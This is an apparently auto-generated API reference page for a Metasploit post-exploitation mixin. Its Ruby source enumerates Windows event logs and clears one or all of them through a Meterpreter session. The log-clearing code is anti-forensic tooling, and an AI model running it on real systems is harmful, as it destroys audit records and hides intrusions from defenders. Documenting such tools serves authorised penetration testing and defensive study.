Module: Msf::Post::Windows::Eventlog

Defined in:
lib/msf/core/post/windows/eventlog.rb

Instance Method Summary collapse

Instance Method Details

#eventlog_clear(evt = "") ⇒ Object

Clears a given eventlog or all eventlogs if none is given. Returns an array of eventlogs that where cleared.



42
43
44
45
46
47
48
49
50
51
52
53
54
# File 'lib/msf/core/post/windows/eventlog.rb', line 42

def eventlog_clear(evt = "")
  evntlog = []
  if evt.empty?
    evntlog = eventloglist
  else
    evntlog << evt
  end
  evntlog.each do |e|
    log = session.sys.eventlog.open(e)
    log.clear
  end
  return evntlog
end

#eventlog_listObject

Enumerate eventlogs



27
28
29
30
31
32
33
34
35
36
# File 'lib/msf/core/post/windows/eventlog.rb', line 27

def eventlog_list
  key = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\"
  if session.sys.config.sysinfo['OS'] =~ /Windows 2003|\.Net|XP|2000/
    key = "#{key}Eventlog"
  else
    key = "#{key}eventlog"
  end
  eventlogs = registry_enumkeys(key)
  return eventlogs
end

#initialize(info = {}) ⇒ Object



8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
# File 'lib/msf/core/post/windows/eventlog.rb', line 8

def initialize(info = {})
  super(
    update_info(
      info,
      'Compat' => {
        'Meterpreter' => {
          'Commands' => %w[
            stdapi_sys_config_sysinfo
            stdapi_sys_eventlog_*
          ]
        }
      }
    )
  )
end